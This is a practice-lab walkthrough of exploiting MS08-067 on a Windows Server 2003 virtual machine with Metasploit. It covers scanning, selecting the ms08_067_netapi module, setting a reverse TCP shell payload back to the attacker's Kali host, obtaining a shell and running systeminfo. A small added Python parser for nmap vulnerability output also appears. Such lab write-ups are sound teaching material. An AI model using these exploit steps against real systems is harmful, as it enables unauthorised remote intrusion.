Environment
- Kali Linux --- IP address: 10.10.10.100
- Windows Server 2003 (target) --- IP address: 10.10.10.130
Scan the target for vulnerability information
msf > db_nmap --script=vuln 10.10.10.130
The scan results are as follows; the MS08-067 vulnerability is present.
[*] Nmap: Host script results:
[*] Nmap: | smb-vuln-ms08-067:
[*] Nmap: | VULNERABLE:
[*] Nmap: | Microsoft Windows system vulnerable to remote code execution (MS08-067)
[*] Nmap: | State: VULNERABLE
[*] Nmap: | IDs: CVE:CVE-2008-4250
[*] Nmap: | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
[*] Nmap: | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
[*] Nmap: | code via a crafted RPC request that triggers the overflow during path canonicalization.
[*] Nmap: |
[*] Nmap: | Disclosure date: 2008-10-23
[*] Nmap: | References:
[*] Nmap: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[*] Nmap: |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
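As an added example (not part of the original record), a small Python parser for the db_nmap vuln-script output above: it turns each smb-vuln-* block into a record with state, CVE ids, disclosure date and references, so scan results can be triaged and tracked against patching. The sample text is constructed from the output quoted above.

```python
import re

# Constructed sample: the db_nmap --script=vuln output quoted above, with nmap's own indentation.
SAMPLE = """\
[*] Nmap: Host script results:
[*] Nmap: | smb-vuln-ms08-067:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Microsoft Windows system vulnerable to remote code execution (MS08-067)
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  CVE:CVE-2008-4250
[*] Nmap: |           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
[*] Nmap: |
[*] Nmap: |     Disclosure date: 2008-10-23
[*] Nmap: |     References:
[*] Nmap: |       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[*] Nmap: |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
"""

# Metasploit prefixes every nmap line with "[*] Nmap: "; script output continues with "|" or "|_" (last line).
LINE = re.compile(r"^\[\*\] Nmap: \|_?\s*(.*)$")
SCRIPT = re.compile(r"^(smb-vuln-[\w-]+):\s*$")

def parse_vuln_scripts(text):
    """One dict per smb-vuln-* block: name, state, CVE ids, disclosure date, references."""
    findings, current = [], None
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # e.g. "Host script results:" carries no "|" and belongs to no script
        line = m.group(1).strip()
        s = SCRIPT.match(line)
        if s:  # a new script block starts
            current = {"name": s.group(1), "state": None, "cves": [], "disclosure": None, "refs": []}
            findings.append(current)
        elif current is None:
            continue
        elif line.startswith("State:"):
            current["state"] = line.split(":", 1)[1].strip()
        elif line.startswith("IDs:"):
            current["cves"] += re.findall(r"CVE-\d{4}-\d+", line)
        elif line.startswith("Disclosure date:"):
            current["disclosure"] = line.split(":", 1)[1].strip()
        elif line.startswith("http"):
            current["refs"].append(line)
    return findings

def vulnerable_findings(text):
    """Only the scripts that reported State: VULNERABLE, i.e. what needs patch tracking."""
    return [f for f in parse_vuln_scripts(text) if f["state"] == "VULNERABLE"]
```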
Search for the matching exploit module
msf > search ms08-067
Matching Modules
================
Name                                 Disclosure Date  Rank   Check  Description
----                                 ---------------  ----   -----  -----------
exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
msf >
Load the exploit module
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) >
List the usable payloads; we choose generic/shell_reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name                       Disclosure Date  Rank    Check  Description
----                       ---------------  ----    -----  -----------
generic/custom                              normal  No     Custom Payload
generic/debug_trap                          normal  No     Generic x86 Debug Trap
generic/shell_bind_tcp                      normal  No     Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp                   normal  No     Generic Command Shell, Reverse TCP Inline
generic/tight_loop                          normal  No     Generic x86 Tight Loop
...
msf exploit(windows/smb/ms08_067_netapi) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
Review the parameters that need to be configured.
In Module options, entries whose Required column is yes must be given a value.
In Current Setting, an empty entry has to be set manually; one that already holds a value is the default, and I keep the defaults here.
Payload options work the same way as Module options.
In Exploit target, Id 0 means the target's operating system type is chosen automatically. show targets lists the systems that can be selected.
msf exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       The SMB service port (TCP)
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (generic/shell_reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
Set the relevant parameters; leave target on automatic.
msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.130 # set the target IP address
rhost => 10.10.10.130
msf exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.10.100 # set the local (listener) IP address
lhost => 10.10.10.100
msf exploit(windows/smb/ms08_067_netapi) >
Once everything is set, check tests whether the exploit can be run against the target; exploit then launches it.
msf exploit(windows/smb/ms08_067_netapi) > check
[+] 10.10.10.130:445 The target is vulnerable.
msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 10.10.10.100:4444
[*] 10.10.10.130:445 - Automatically detecting the target...
[*] 10.10.10.130:445 - Fingerprint: Windows 2003 - - lang:Unknown
[*] 10.10.10.130:445 - Selected Target: Windows 2003 SP0 Universal
[*] 10.10.10.130:445 - Attempting to trigger the vulnerability...
C:\WINDOWS\system32>
The exploit succeeded; view the target's system information.
C:\WINDOWS\system32>systeminfo
systeminfo
Host Name: ROOT-TVI862UBEH
OS Name: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS Version: 5.2.3790 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: root
Registered Organization:
Product ID: 69713-640-9722366-45109
Original Install Date: 11/15/2011, 9:50:15 PM
System Up Time: 0 Days, 0 Hours, 52 Minutes, 34 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 10 Stepping 7 GenuineIntel ~3100 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+08:00) Beijing, Chongqing, Hong Kong, Urumqi
Total Physical Memory: 767 MB
Available Physical Memory: 321 MB
Page File: Max Size: 2,474 MB
Page File: Available: 1,808 MB
Page File: In Use: 666 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: File 1
[02]: Q147222
[03]: KB893803v2 - Update
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.130
C:\WINDOWS\system32>
The above is a record of the practice exercise.